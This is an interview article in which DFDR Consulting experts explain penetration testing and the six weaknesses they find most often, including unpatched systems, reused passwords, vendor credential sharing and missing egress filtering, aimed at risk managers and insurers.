Know Your Vulnerabilities: A Q&A with Michael Nelson, Steve Greenawalt, and Ken Pyle of DFDR Consulting, LLC
When a cyber event occurs, companies are often surprised by just how exposed they are to attack. Penetration testing conducted by an outside party will reveal those security issues that can be difficult to detect from the inside. We talked to Michael Nelson, Steve Greenawalt, and Ken Pyle of DFDR Consulting, LLC., about the vulnerabilities revealed by testing and the top six problems they see most frequently.
What can penetration testing tell a risk manager or insured about their organization’s cyber readiness?
KP: Companies invest in security controls and protections such as firewalls, antivirus applications, and other measures, but they often need an outside perspective to ensure these investments are working as they should. We think of penetration testing as a due diligence tool. It’s about finding what nobody was aware of––such as a vendor’s product with zero day exposure. It also helps the company understand what a cyberattack looks like and how to both identify and counter the attack when it happens.
SG: The automobile industry provides a helpful illustration for this topic. If you drive a car, then you’re probably familiar with the concept of crash testing and reliability data, which offer valuable information to the potential buyer.
Third party performance testing plays a similar role for your security systems. Once the test is complete, you can identify systemic issues that have been overlooked or vendor issues that need to be addressed. It can boost your confidence in the reliability and effectiveness of the security policies and procedures already in place.
How often should organizations undertake penetration testing? Or, under what circumstances would it be indicated?
MN: Depending on the industry, the frequency of penetration testing may be determined by compliance standards. As a rule of thumb, you should undertake testing once a year. But, testing may be needed sooner if your organization undergoes major changes, such as new personnel or technology upgrades. Organizations are also advised to undergo a quarterly vulnerability assessment, which is a semi-automated process aimed at identifying and prioritizing weaknesses in the system.
What is threat hunting?
SG: Threat hunting is an ongoing practice that takes the organization’s security to the next level by moving past a reliance on passive measures such as firewalls and anti-virus software. Threat hunting begins with the assumption that someone has already infiltrated the environment. The purpose is to gain a deeper understanding of the environment and detect anomalous activities that might be attributable to malicious actors.
There are a number of different ways to go about doing this, depending on the resources available and the maturity of the organization’s controls. One strategy is to focus on endpoint detection and response solutions (EDR).
EDR solutions record very granular telemetry data about the processes, network connections, and file modifications that are occurring on every monitored workstation and server. That data is then analyzed for indicators of compromise. Organizations with more advanced systems might implement user behavior analytics in an effort to detect insider threats.
What are the top six types of problems your team discovers through penetration testing services?
1. Patch Management
SG: A lot of organizations tend to rely on Microsoft and its automatic updates. Unfortunately, that’s far from the only software that requires updating. Organizations are probably also using Adobe products, Java, a financial suite, an ERP suite, not to mention business applications on their workstations and servers.
There is also a need to regularly update firmware on firewalls, routers, switches, and other infrastructure devices. Companies tend to have a poor awareness of the risk exposures present in their environments because their patch management programs are insufficient.
By way of illustration, EternalBlue is a Windows exploit developed by the National Security Agency (NSA). In April 2017, a hacker group called the Shadow Brokers leaked the program a month after Microsoft had released patches for the vulnerability. When run against a vulnerable system, Eternal Blue gives Administrator privileges to an unauthenticated attacker on the system.
Almost three years later, our security team continues to find this vulnerability in the majority of our security engagements. A successfully installed Windows update, which has been available for years is all that is required to fix this issue.
2. Access Management/Password Hygiene
KP: All too often, device, application, and manufacturer credentials are left unchanged on their default “out of the box” setting. All it takes is that basic password that was never changed, and an adversary can crack the perimeter or move laterally through your network.
Using the same password across sites is another major issue. We can assume that many of our usernames and passwords have been published on the dark web as a result of numerous data breaches. If you’re reusing these sensitive credentials across sites, the bad guy can use credential stuffing to hack your systems.
Credential stuffing is the act of using stolen username and password combinations to gain access to accounts such as Facebook, Netflix, Amazon, or corporate networks through automated login requests.
SG: We’ve found a real lack of awareness when it comes to the implementation of the least-privilege principle. This principle says that end users and applications should be granted only the bare minimum of permissions necessary to complete their duties. In theory, this sounds easy enough, but it can be difficult to implement effectively across an organization. Malicious actors are able to leverage lapses in least privilege to their advantage.
3. Lack of Inventory Awareness
SG: Another thing we see is that organizations often have no awareness or visibility into the hardware and software assets on their network.
KP: If they don’t know what exists in their environment, then it’s certain that they’re not properly maintaining, patching, or decommissioning the equipment or software once it is no longer used. Many times these assets are related to virtual servers or cloud solutions, which you forget about because you aren’t seeing them.
Or, employees will leave the organization, yet their accounts remain active. This is particularly true for developers utilizing multiple accounts for different purposes, or a shared account that never changes and multiple individuals know the credentials.
MN: Once attackera has found their way into the network, they can use these tools to further
their foothold or even take full control—completely undetected. If attackers move around the network using the same tools and methods as the administrator, you might never know someone else has gained access.
KP: Powershell is a good example of the type of tool that can be used in this way. Powershell is often unrestricted for use on workstations. Scripted attacks utilizing this tool can be quite sophisticated and bypass code controls even while appearing innocuous. It’s kind of like leaving the drill and lock picks by the safe and saying, “Take a shot if you want!”
4. Poor Vendor Management
KP: Many companies are simply not aware of the risks that vendors bring into the picture. Oftentimes, they have a vendor agreement in place for protection but one that doesn’t spell out the rules of engagement.
The client believes that since they outsourced the role, they don’t have to worry about it. In reality, there may be serious problems happening. For example, perhaps the vendor never enabled logging or access control. Often, vendors set up a single administrator account and then share it with all staff members.
Penetration testing tools help you to find the answers to questions such as whether the vendor is using the same credentials for all their clients. We have seen this in engagements: We were able to use credentials that certain vendors are known to use to gain access. Is the vendor changing the credentials when an employee leaves? On a number of breach response engagements, we have identified a departed employee using the shared information to log into the victim’s environment.
MN: Simply because you are bringing in a vendor or outsourcing does not mean you are no longer responsible for your network or data. You should retain the ability to see what is occurring and what security practices the vendor is using.
5. Lack of Geo IP Filtering
MN: Many times, clients worry about what’s coming into their network but don’t focus on the traffic that is leaving. If a business is U.S. based and doesn’t have clients in China or Russia, or North Korea, then it should be blocking inbound and outbound traffic at the firewall, which can cut down on malware and botnets. This is a proactive measure you can take to eliminate threats.
6. Lack of Will to Change
SG: Occasionally, we run into clients who get penetration testing services because they have a compliance requirement but don’t have the desire to fix what is identified during the test. If steps aren’t taken to remediate the issues, subsequent tests may identify the same deficiencies year after year. As a result, the insured may be accused of negligence by the insurer during the claims process, by regulators during a breach, or by the courts during litigation. If you do engage with testing, you should be prepared to address the problems that emerge.
NetDiligence on Why Penetration Testing Matters
We would like to thank DFDR Consulting for their expert insights into the topic of penetration testing. At NetDiligence®, we find that a penetration test is one of the most valuable measures an organization can undertake on a proactive basis to get the “hacker’s view” of its network.
Our cyber risk insurance community requires this type of due diligence on occasion in order to gauge whether a policyholder’s network is reasonably patched to prevent or deflect many common exploits.
And, as summarized by DFDR’s excellent list above, a pen-test will typically uncover dozens to hundreds of red flags even at well-prepared organizations. The fact is that protecting information assets that reside in multiple repositories while managing a network with public internet-facing endpoints is challenging even for the best of Chief Security Officers.
To learn more about how to do penetration testing and what the service might look like for your organization, we encourage you to reach out to us at NetDiligence by calling 814-360-0408.